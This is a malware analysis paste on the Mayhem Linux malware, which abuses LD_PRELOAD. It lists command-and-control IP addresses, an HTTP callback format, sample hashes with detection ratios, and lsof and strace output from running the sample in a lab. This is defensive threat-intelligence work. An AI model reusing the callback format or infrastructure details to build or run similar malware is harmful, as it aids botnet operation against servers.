SHARE
TWEET

Mayhem installer Aug 5th 2014

MalwareMustDie Aug 5th, 2014 560 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMUSTDie! Mayhem (.so ELF malware abusing LD_PRELOAD) installer
  2. # Case spotted & captured by @yinX, analyzed : @unixfreaxjp
  3. # CNC: 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
  4. # Attacker Source;
  5. $ echo 46.149.111.171   |bash origin.sh
  6. 46.149.111.171||61214 | 46.149.111.0/24 | VDSINSIDE | UA | VDSINSIDE.COM | ELERIUM LTD
  7. $
  8. $ echo 188.165.217.216   |bash origin.sh
  9. 188.165.217.216|ns312431.ip-188-165-217.eu.|16276 | 188.165.0.0/16 | OVH | FR | OVH.COM | OVH SAS
  10. $
  11. $ echo 176.119.3.242   |bash origin.sh
  12. 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
  13.  
  14. # callback format:
  15.    POST /cupids_banner/cupids.php HTTP/1.0
  16.    Host: lovecupidonline.info
  17.    Pragma: 1337
  18.  
  19. #Detection ratio in Virus Total (noted, it is NOT Windows binary, detection ratio for these are VERY reliable actual figure)
  20.  
  21. PHP installer: (6/54) 03c80f6d678857431645e079eeacb21cbe4e37f1a4643814dd7ad67a926d8c2a
  22. ELF bruteforce.so: (2/54) 3ec6f7201d8578b2befb55652a2c9df25ed0e62ffd8e38f8d9bea23bebfdcf3c
  23. ELF cmsurls.so: (2/54) 3d07e0fb23d0e498b25bca7f4dd696cf507763242725e98b92178332a112bc36
  24. ELF atom-aggregator-32.so (16/54) 8983f3a07236bcf24f8db4c4c0cec1ad0042806cbf431500867da01c2f4619d4
  25. ELF atom-aggregator-64.so (14/54) 77d77eed0cad458fd1f3278d5bb93b8e7073d87f855c9e811cec66abad428b53
  26.  
  27. // dropped malware drive:
  28.  
  29. -rw-r--r-- 1 12582912 Aug  5 10:25 .cache 74fb94dcf856dbe4e848dbcedb51c419
  30. #fail in decrypting...
  31.  
  32. // samples:
  33.  
  34. MD5 (atom-aggregator-32.so) = 61092c67dd76505ed23434fdad14f26a (this binary analysis)
  35. MD5 (atom-aggregator-64.so) = af680d137d3fb407ef654a98e2ac7643 (this binary analysis)
  36. MD5 (bruteforce.so) = ab69765fadcec09e44cc0df06653982e ==> bruters, self explanatory
  37. MD5 (cmsurls.so) = 720bc891a7468ef5c29eb4da211c142b ==> callbacks: https://gist.github.com/Yinette/082d616453ca574c6a7b
  38.  
  39. // executed, PoC:
  40.  
  41. mmd@1x111 ~/0x02E/009 $ date
  42. Tue Aug  5 10:27:46 CEST 2014
  43.  
  44. $ lsof |grep atom
  45. host      18153              mmd  DEL       REG      9,2          30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
  46.  
  47. $ lsof -p 18153
  48. COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF     NODE NAME
  49. host    18153  mmd  cwd    DIR    9,2     4096 30148960 /home/mmd/0x02E/009
  50. host    18153  mmd  rtd    DIR    9,2     4096        2 /
  51. host    18153  mmd  txt    REG    9,2   117128 12453326 /usr/bin/host
  52. host    18153  mmd  mem    REG    9,2    22928 38797877 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
  53. host    18153  mmd  mem    REG    9,2    47616 38797878 /lib/x86_64-linux-gnu/libnss_files-2.13.so
  54. host    18153  mmd  mem    REG    9,2 12582912 30149146 /home/mmd/0x02E/009/.cache
  55. host    18153  mmd  mem    REG    9,2    93208 12455541 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
  56. host    18153  mmd  mem    REG    9,2   530736 38797873 /lib/x86_64-linux-gnu/libm-2.13.so
  57. host    18153  mmd  mem    REG    9,2   141784 38797700 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
  58. host    18153  mmd  mem    REG    9,2    18672 38797775 /lib/x86_64-linux-gnu/libattr.so.1.1.0
  59. host    18153  mmd  mem    REG    9,2    34840 12456099 /usr/lib/libisccc.so.80.0.2
  60. host    18153  mmd  mem    REG    9,2    92752 38797727 /lib/x86_64-linux-gnu/libz.so.1.2.7
  61. host    18153  mmd  mem    REG    9,2    80712 38797886 /lib/x86_64-linux-gnu/libresolv-2.13.so
  62. host    18153  mmd  mem    REG    9,2    14320 38797702 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
  63. host    18153  mmd  mem    REG    9,2    35400 12455796 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
  64. host    18153  mmd  mem    REG    9,2    14672 38797691 /lib/x86_64-linux-gnu/libcom_err.so.2.1
  65. host    18153  mmd  mem    REG    9,2   162632 12455436 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
  66. host    18153  mmd  mem    REG    9,2   868096 12455510 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
  67. host    18153  mmd  mem    REG    9,2   219192 12451949 /usr/lib/libGeoIP.so.1.4.8
  68. host    18153  mmd  mem    REG    9,2  1599536 38797824 /lib/x86_64-linux-gnu/libc-2.13.so
  69. host    18153  mmd  mem    REG    9,2  1436984 12455509 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
  70. host    18153  mmd  mem    REG    9,2   131107 38797884 /lib/x86_64-linux-gnu/libpthread-2.13.so
  71. host    18153  mmd  mem    REG    9,2    17112 38797717 /lib/x86_64-linux-gnu/libcap.so.2.22
  72. host    18153  mmd  mem    REG    9,2    14768 38797839 /lib/x86_64-linux-gnu/libdl-2.13.so
  73. host    18153  mmd  mem    REG    9,2   368072 12453396 /usr/lib/libisc.so.84.1.0
  74. host    18153  mmd  mem    REG    9,2   139616 12452611 /usr/lib/libisccfg.so.82.0.3
  75. host    18153  mmd  mem    REG    9,2    51048 12452613 /usr/lib/libbind9.so.80.0.7
  76. host    18153  mmd  mem    REG    9,2  2048480 12455516 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  77. host    18153  mmd  mem    REG    9,2   257288 12455485 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
  78. host    18153  mmd  mem    REG    9,2  1674552 12452609 /usr/lib/libdns.so.88.1.1
  79. host    18153  mmd  mem    REG    9,2    75752 12455394 /usr/lib/liblwres.so.80.0.3
  80. host    18153  mmd  DEL    REG    9,2          30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
  81. host    18153  mmd  mem    REG    9,2   136936 38797728 /lib/x86_64-linux-gnu/ld-2.13.so
  82. host    18153  mmd    0r   CHR    1,3      0t0     1027 /dev/null
  83. host    18153  mmd    1r   CHR    1,3      0t0     1027 /dev/null
  84. host    18153  mmd    2r   CHR    1,3      0t0     1027 /dev/null
  85. host    18153  mmd    3r   CHR    1,3      0t0     1027 /dev/null
  86.  
  87. // patch to debug:
  88.  
  89. execve("/usr/bin/host", ["/usr/bin/host"], [/* 20 vars */]) = 0
  90. brk(0)                                  = 0x7f57dd0d4000
  91. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  92. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0bf000
  93. open("./atom-aggregator-64.so", O_RDONLY) = 3
  94. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0x\23\0\0\0\0\0\0"..., 832) = 832
  95. fstat(3, {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
  96. getcwd("/home/mmd/0x02E/009", 128)      = 20
  97. mmap(NULL, 2151928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57dac94000
  98. mprotect(0x7f57dac9b000, 2093056, PROT_NONE) = 0
  99. mmap(0x7f57dae9a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f57dae9a000
  100. mmap(0x7f57dae9b000, 26104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57dae9b000
  101. mprotect(0x7fff5d64a000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
  102. close(3)                                = 0
  103. access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
  104. open("/etc/ld.so.cache", O_RDONLY)      = 3
  105. fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  106. mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f57db0b1000
  107. close(3)                                = 0
  108. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  109. open("/usr/lib/liblwres.so.80", O_RDONLY) = 3
  110. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P6\0\0\0\0\0\0"..., 832) = 832
  111. fstat(3, {st_mode=S_IFREG|0644, st_size=75752, ...}) = 0
  112. mmap(NULL, 2171040, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57daa81000
  113. mprotect(0x7f57daa93000, 2093056, PROT_NONE) = 0
  114. mmap(0x7f57dac92000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x11000) = 0x7f57dac92000
  115. close(3)                                = 0
  116. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  117. open("/usr/lib/libdns.so.88", O_RDONLY) = 3
  118. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\244\2\0\0\0\0\0"..., 832) = 832
  119. fstat(3, {st_mode=S_IFREG|0644, st_size=1674552, ...}) = 0
  120. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0b0000
  121. mmap(NULL, 3773136, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da6e7000
  122. mprotect(0x7f57da879000, 2093056, PROT_NONE) = 0
  123. mmap(0x7f57daa78000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x191000) = 0x7f57daa78000
  124. mmap(0x7f57daa80000, 720, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57daa80000
  125. close(3)                                = 0
  126. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  127. open("/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2", O_RDONLY) = 3
  128. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\266\0\0\0\0\0\0"..., 832) = 832
  129. fstat(3, {st_mode=S_IFREG|0644, st_size=257288, ...}) = 0
  130. mmap(NULL, 2353120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da4a8000
  131. mprotect(0x7f57da4e4000, 2097152, PROT_NONE) = 0
  132. mmap(0x7f57da6e4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3c000) = 0x7f57da6e4000
  133. close(3)                                = 0
  134. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  135. open("/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0", O_RDONLY) = 3
  136. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\207\7\0\0\0\0\0"..., 832) = 832
  137. fstat(3, {st_mode=S_IFREG|0644, st_size=2048480, ...}) = 0
  138. mmap(NULL, 4158808, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da0b0000
  139. mprotect(0x7f57da27a000, 2097152, PROT_NONE) = 0
  140. mmap(0x7f57da47a000, 172032, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7f57da47a000
  141. mmap(0x7f57da4a4000, 13656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57da4a4000
  142. close(3)                                = 0
  143. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  144. open("/usr/lib/libbind9.so.80", O_RDONLY) = 3
  145. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340-\0\0\0\0\0\0"..., 832) = 832
  146. fstat(3, {st_mode=S_IFREG|0644, st_size=51048, ...}) = 0
  147. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0af000
  148. mmap(NULL, 2146352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9ea3000
  149. mprotect(0x7f57d9eaf000, 2093056, PROT_NONE) = 0
  150. mmap(0x7f57da0ae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xb000) = 0x7f57da0ae000
  151. close(3)                                = 0
  152. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  153. open("/usr/lib/libisccfg.so.82", O_RDONLY) = 3
  154. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\355\0\0\0\0\0\0"..., 832) = 832
  155. fstat(3, {st_mode=S_IFREG|0644, st_size=139616, ...}) = 0
  156. mmap(NULL, 2238208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9c80000
  157. mprotect(0x7f57d9c9b000, 2097152, PROT_NONE) = 0
  158. mmap(0x7f57d9e9b000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b000) = 0x7f57d9e9b000
  159. mmap(0x7f57d9ea2000, 1792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9ea2000
  160. close(3)                                = 0
  161. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  162. open("/usr/lib/libisc.so.84", O_RDONLY) = 3
  163. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360\374\0\0\0\0\0\0"..., 832) = 832
  164. fstat(3, {st_mode=S_IFREG|0644, st_size=368072, ...}) = 0
  165. mmap(NULL, 2464112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9a26000
  166. mprotect(0x7f57d9a7e000, 2093056, PROT_NONE) = 0
  167. mmap(0x7f57d9c7d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x57000) = 0x7f57d9c7d000
  168. close(3)                                = 0
  169. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  170. open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3
  171. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\r\0\0\0\0\0\0"..., 832) = 832
  172. fstat(3, {st_mode=S_IFREG|0644, st_size=14768, ...}) = 0
  173. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ae000
  174. mmap(NULL, 2109696, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9822000
  175. mprotect(0x7f57d9824000, 2097152, PROT_NONE) = 0
  176. mmap(0x7f57d9a24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d9a24000
  177. close(3)                                = 0
  178. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  179. open("/lib/x86_64-linux-gnu/libcap.so.2", O_RDONLY) = 3
  180. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\26\0\0\0\0\0\0"..., 832) = 832
  181. fstat(3, {st_mode=S_IFREG|0644, st_size=17112, ...}) = 0
  182. mmap(NULL, 2112384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d961e000
  183. mprotect(0x7f57d9622000, 2093056, PROT_NONE) = 0
  184. mmap(0x7f57d9821000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d9821000
  185. close(3)                                = 0
  186. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  187. open("/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY) = 3
  188. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@\\\0\0\0\0\0\0"..., 832) = 832
  189. fstat(3, {st_mode=S_IFREG|0755, st_size=131107, ...}) = 0
  190. mmap(NULL, 2208672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9402000
  191. mprotect(0x7f57d9419000, 2093056, PROT_NONE) = 0
  192. mmap(0x7f57d9618000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7f57d9618000
  193. mmap(0x7f57d961a000, 13216, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d961a000
  194. close(3)                                = 0
  195. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  196. open("/usr/lib/x86_64-linux-gnu/libxml2.so.2", O_RDONLY) = 3
  197. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`\377\2\0\0\0\0\0"..., 832) = 832
  198. fstat(3, {st_mode=S_IFREG|0644, st_size=1436984, ...}) = 0
  199. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ad000
  200. mmap(NULL, 3537400, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d90a2000
  201. mprotect(0x7f57d91f7000, 2097152, PROT_NONE) = 0
  202. mmap(0x7f57d93f7000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x155000) = 0x7f57d93f7000
  203. mmap(0x7f57d9401000, 2552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9401000
  204. close(3)                                = 0
  205. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  206. open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
  207. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  208. fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  209. mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8d17000
  210. mprotect(0x7f57d8e99000, 2093056, PROT_NONE) = 0
  211. mmap(0x7f57d9098000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f57d9098000
  212. mmap(0x7f57d909d000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d909d000
  213. close(3)                                = 0
  214. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  215. open("/usr/lib/libGeoIP.so.1", O_RDONLY) = 3
  216. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0c\0\0\0\0\0\0"..., 832) = 832
  217. fstat(3, {st_mode=S_IFREG|0644, st_size=219192, ...}) = 0
  218. mmap(NULL, 2314592, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8ae1000
  219. mprotect(0x7f57d8b15000, 2093056, PROT_NONE) = 0
  220. mmap(0x7f57d8d14000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x33000) = 0x7f57d8d14000
  221. close(3)                                = 0
  222. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  223. open("/usr/lib/x86_64-linux-gnu/libkrb5.so.3", O_RDONLY) = 3
  224. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\310\1\0\0\0\0\0"..., 832) = 832
  225. fstat(3, {st_mode=S_IFREG|0644, st_size=868096, ...}) = 0
  226. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ac000
  227. mmap(NULL, 2963968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d880d000
  228. mprotect(0x7f57d88d6000, 2093056, PROT_NONE) = 0
  229. mmap(0x7f57d8ad5000, 49152, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xc8000) = 0x7f57d8ad5000
  230. close(3)                                = 0
  231. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  232. open("/usr/lib/x86_64-linux-gnu/libk5crypto.so.3", O_RDONLY) = 3
  233. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360H\0\0\0\0\0\0"..., 832) = 832
  234. fstat(3, {st_mode=S_IFREG|0644, st_size=162632, ...}) = 0
  235. mmap(NULL, 2261424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d85e4000
  236. mprotect(0x7f57d860a000, 2097152, PROT_NONE) = 0
  237. mmap(0x7f57d880a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f57d880a000
  238. mmap(0x7f57d880c000, 432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d880c000
  239. close(3)                                = 0
  240. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  241. open("/lib/x86_64-linux-gnu/libcom_err.so.2", O_RDONLY) = 3
  242. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\26\0\0\0\0\0\0"..., 832) = 832
  243. fstat(3, {st_mode=S_IFREG|0644, st_size=14672, ...}) = 0
  244. mmap(NULL, 2109928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d83e0000
  245. mprotect(0x7f57d83e3000, 2093056, PROT_NONE) = 0
  246. mmap(0x7f57d85e2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d85e2000
  247. close(3)                                = 0
  248. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  249. open("/usr/lib/x86_64-linux-gnu/libkrb5support.so.0", O_RDONLY) = 3
  250. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240%\0\0\0\0\0\0"..., 832) = 832
  251. fstat(3, {st_mode=S_IFREG|0644, st_size=35400, ...}) = 0
  252. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ab000
  253. mmap(NULL, 2130800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d81d7000
  254. mprotect(0x7f57d81df000, 2093056, PROT_NONE) = 0
  255. mmap(0x7f57d83de000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d83de000
  256. close(3)                                = 0
  257. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  258. open("/lib/x86_64-linux-gnu/libkeyutils.so.1", O_RDONLY) = 3
  259. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\22\0\0\0\0\0\0"..., 832) = 832
  260. fstat(3, {st_mode=S_IFREG|0644, st_size=14320, ...}) = 0
  261. mmap(NULL, 2109456, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7fd3000
  262. mprotect(0x7f57d7fd6000, 2093056, PROT_NONE) = 0
  263. mmap(0x7f57d81d5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d81d5000
  264. close(3)                                = 0
  265. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  266. open("/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY) = 3
  267. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3008\0\0\0\0\0\0"..., 832) = 832
  268. fstat(3, {st_mode=S_IFREG|0644, st_size=80712, ...}) = 0
  269. mmap(NULL, 2185864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7dbd000
  270. mprotect(0x7f57d7dd0000, 2093056, PROT_NONE) = 0
  271. mmap(0x7f57d7fcf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7f57d7fcf000
  272. mmap(0x7f57d7fd1000, 6792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d7fd1000
  273. close(3)                                = 0
  274. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  275. open("/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY) = 3
  276. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340#\0\0\0\0\0\0"..., 832) = 832
  277. fstat(3, {st_mode=S_IFREG|0644, st_size=92752, ...}) = 0
  278. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0aa000
  279. mmap(NULL, 2187792, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7ba6000
  280. mprotect(0x7f57d7bbc000, 2093056, PROT_NONE) = 0
  281. mmap(0x7f57d7dbb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7f57d7dbb000
  282. close(3)                                = 0
  283. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  284. open("/usr/lib/libisccc.so.80", O_RDONLY) = 3
  285. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320'\0\0\0\0\0\0"..., 832) = 832
  286. fstat(3, {st_mode=S_IFREG|0644, st_size=34840, ...}) = 0
  287. mmap(NULL, 2130208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d799d000
  288. mprotect(0x7f57d79a5000, 2093056, PROT_NONE) = 0
  289. mmap(0x7f57d7ba4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d7ba4000
  290. close(3)                                = 0
  291. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  292. open("/lib/x86_64-linux-gnu/libattr.so.1", O_RDONLY) = 3
  293. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\25\0\0\0\0\0\0"..., 832) = 832
  294. fstat(3, {st_mode=S_IFREG|0644, st_size=18672, ...}) = 0
  295. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a9000
  296. mmap(NULL, 2113880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7798000
  297. mprotect(0x7f57d779c000, 2093056, PROT_NONE) = 0
  298. mmap(0x7f57d799b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d799b000
  299. close(3)                                = 0
  300. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  301. open("/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY) = 3
